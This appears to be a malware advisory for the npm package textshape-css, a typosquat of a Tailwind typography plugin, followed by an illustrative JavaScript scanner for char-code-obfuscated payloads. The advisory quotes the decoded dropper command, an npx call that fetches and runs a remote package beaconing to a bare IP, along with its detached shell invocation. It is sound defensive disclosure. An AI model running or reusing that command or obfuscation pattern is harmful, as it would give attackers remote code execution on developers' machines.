MAL-2026-6475
Malicious code in textshape-css (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60)

The package presents itself as a Tailwind CSS typography plugin (its name, description, and source tree clone @tailwindcss/typography), but src/index.js appends an obfuscated payload that runs at module load. Char-code arrays at the bottom of src/index.js decode to `child_process`, `spawn`/`exec`, `/bin/sh`, and the command `npx -y runtimedev-link@latest --token "http://194.11.226.41:4000|zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9"`. A trailing `_.y();` invokes this immediately whenever any consumer does `require('textshape-css')` / `import 'textshape-css'`. On POSIX it spawns `/bin/sh -c 'nohup... >/dev/null 2>&1'` detached with stdio ignored; on Windows it goes via `child_process.exec` with `windowsHide`. The effect is to fetch and run an unpinned third-party npm package (`runtimedev-link@latest`) that beacons to a bare IP (194.11.226.41:4000) over plain HTTP with an attacker-supplied token — a remote-code-execution dropper. The package name and description are a near-verbatim typosquat of @tailwindcss/typography, targeting developers searching for that plugin.
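A defender-side check for the obfuscation described above, as an added example that is not part of the advisory or of any scanner's own code: it decodes decimal char-code array literals in a JavaScript source and flags those that spell out the strings the advisory names. The function names, the sample source and the `example-pkg` name are constructed for illustration.

```javascript
// Strings the advisory says the char-code arrays decode to.
const INDICATORS = ['child_process', 'spawn', 'exec', '/bin/sh', 'npx '];

// Find numeric array literals such as [99,104,105] and decode the ones whose
// elements are all printable ASCII. Decimal literals only; hex is not handled.
function decodeCharCodeArrays(source, minLength = 4) {
  const found = [];
  const arrayLiteral = /\[\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*,?\s*\]/g;
  for (const match of source.matchAll(arrayLiteral)) {
    const codes = match[1].split(',').map((n) => Number(n.trim()));
    if (codes.length < minLength) continue;
    if (!codes.every((c) => c >= 32 && c <= 126)) continue;
    found.push({ offset: match.index, text: String.fromCharCode(...codes) });
  }
  return found;
}

// Report decoded arrays that contain any indicator string.
function scanSource(source) {
  const hits = [];
  for (const { offset, text } of decodeCharCodeArrays(source)) {
    const matched = INDICATORS.filter((s) => text.includes(s));
    if (matched.length > 0) hits.push({ offset, text, matched });
  }
  return hits;
}

// Constructed sample: strings encoded as arrays, with no execution logic.
const toArray = (s) =>
  '[' + Array.from(s, (ch) => ch.charCodeAt(0)).join(',') + ']';
const SAMPLE = [
  'module.exports = plugin;',
  'const a = ' + toArray('child_process') + ';',
  'const b = ' + toArray('/bin/sh') + ';',
  'const c = ' + toArray('npx -y example-pkg@latest') + ';',
  'const sizes = [12, 14, 16, 18];', // benign: not printable ASCII, skipped
].join('\n');

for (const hit of scanSource(SAMPLE)) {
  const text = JSON.stringify(hit.text);
  console.log(`offset ${hit.offset}: ${text} (${hit.matched.join(', ')})`);
}
```

Run it over each `.js` file of an installed dependency tree; a hit in a package that advertises itself as a CSS plugin warrants manual review of the file.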
Affected packages
No fixed version published yet for textshape-css (npm). Pin to a known-safe version or switch to an alternative.